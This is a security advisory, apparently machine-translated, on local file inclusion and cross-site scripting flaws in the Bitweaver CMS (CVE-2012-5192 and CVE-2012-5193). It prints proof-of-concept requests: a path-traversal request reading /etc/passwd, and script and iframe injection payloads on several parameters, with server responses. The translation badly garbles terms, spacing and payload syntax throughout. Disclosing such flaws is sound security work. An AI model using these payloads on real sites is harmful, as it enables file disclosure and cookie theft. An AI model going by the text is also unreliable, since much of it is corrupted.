Bitweaver multiple cross-site scripting and local file inclusion Vulnerabilities

Release date:
Updated on:

Affected Systems:
Bitweaver 3.x
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56230
Cve id: CVE-2012-5192, CVE-2012-5193

Bitweaver is a free open-source Web application framework and content management system.

Bitweaver 3.1 and other versions have multiple security vulnerabilities, attackers can exploit these vulnerabilities to execute arbitrary script code, steal cookie authentication creden。, and open or run arbitrary files in the Web server process.

1) Input passed to users/remind_password.php through the "username" POST parameter, and "days" POST parameter to stats/index. the input and "login" POST parameters passed by php are sent to users/register. if the input passed by php is incorrectly filtered, it is returned to the user. Attackers can execute arbitrary HTML and script code in the user's browser of the affected site.

2) Input passed to quicktags/special_chars.php through the "textarea_id" parameter. If the input passed by the "email" POST parameter to users/register. php is incorrectly filtered, it is returned to the user. Attackers can execute arbitrary HTML and script code in the user's browser of the affected site.

<* Source: David Aaron
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Finding 1: Local File compression sion Vulnerability
CVE-2012-5192 (CVE)

The 'overlay _ type' parameter in the 'gmap/view_overlay.php 'page in
Bitweaver is vulnerable to a local file compression sion vulnerability.

This vulnerability can be demonstrated by traversing to a known readable
Path on the web server file system.

Example:

Ming LFI on 'overlay _ type' parameter

# Request

Http://www.example.com/bitweaver/gmap/view_overlay.php? Overlay_type =... % 2F... % 2F... % 2F... % 2F... % 2F... % 2F... % 2F... % 2F/etc/passwd % 00

# Response

Root: x: 0: 0: root:/bin/bash
<Snip>

Finding 2: Multiple XSS Vulnerabilities in Bitweaver
CVE-2012-5193 (CVE)

Multiple cross-site scripting (XSS) vulnerabilities have been discovered
That allow remote unauthenticated users to run arbitrary scripts on
System.

Example:

The following Proof of Concepts extends strate that Bitweaver 2.8.1 is
Vulnerable to XSS.

Example (s ):

1. Padding Ming XSS on stats/index. php

# Request

GET/bitweaver/stats/index. php/% 22% 3E % 3 Cscript % 3 Ealert ('xsss') % 3B % 3C % 2 Fscript % 3E HTTP/1.0

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:34 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3. 6
Set-Cookie: BWSESSION = 4gmfnd86ahtvn34v5oejgivvh3; path =/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset = UTF-8
[Truncated due to length]

2. Discovery Ming XSS on/newsletters/edition. php

# Request

GET/bitweaver/newsletters/edition. php/% 22% 3E % 3 Cscript % 3 Ealert ('xss') % 3B % 3C % 2 Fscript % 3E HTTP/1.0

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:42:02 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3. 6
Set-Cookie: BWSESSION = ajdjp797r7atral75rmlhcgs63; path =/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset = UTF-8
[Truncated due to length]

3. Specify Ming XSS on the 'username' parameter available on/users/

# Request

POST/bitweaver/users/remind_password.php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 192

Username = % 22% 3E % 3 Cscript % 3 Ealert ('xss') % 3B % 3C % 2 Fscript % 3E & remind = Reset + % 28 password % 29

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:53:11 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3. 6
Set-Cookie: BWSESSION = i0ktqmt3497thag552t9ds78v4; path =/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset = UTF-8
Content-Length: 15974
[Truncated due to length]

<Snip>
Invalid or unknown username: "> alert ('xsss'); </p> </div> Please follow the instructions in the email.
<Snip>

4. Specify Ming XSS on the 'days 'parameter on/stats/index. php

# Request

POST/bitweaver/stats/index. php HTTP/1.1
Host: www.example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 177

Days = % 22% 3E % 3 Cscript % 3 Ealert ('xss') % 3B % 3C % 2 Fscript % 3E & pv_chart = Display

# Response
HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:55:53 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3. 6
Set-Cookie: BWSESSION = dqdvcnmql8jhngp0tphseh1qh4; path =/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset = UTF-8
Content-Length: 24778
[Truncated due to length]

<Snip>
<script> alert ('xss'); </script>" alt = "Site Usage Statistics"/>
<Snip>

5. Specify Ming XSS on the 'login' parameter on/users/register. php. (try
Entering "> <IFRAME src =" https://www.trustwave.com "height =" 1000px"
Width = "1000px"> into the "Username field "):

Http://www.example.com/bitweaver/users/register.php

6. Specify Ming XSS on the 'highlight' parameter:

# Request

GET/bitweaver /? Highlight = % 2522% 253E % 253 Cscript % 253 Ealert ('xss') % 253B % 253C % 252 Fscript % 253E HTTP/1.0

# Response

HTTP/1.1 200 OK
Date: Tue, 17 Apr 2012 15:59:09 GMT
Server: Apache/2.2.20 (Ubuntu)
X-Powered-By: PHP/5.3.6-13ubuntu3. 6
Set-Cookie: BWSESSION = ama93jqlojmi385plkft5opl64; path =/bitweaver/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check = 0, pre-check = 0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset = UTF-8

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

Bitweaver
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.bitweaver.org/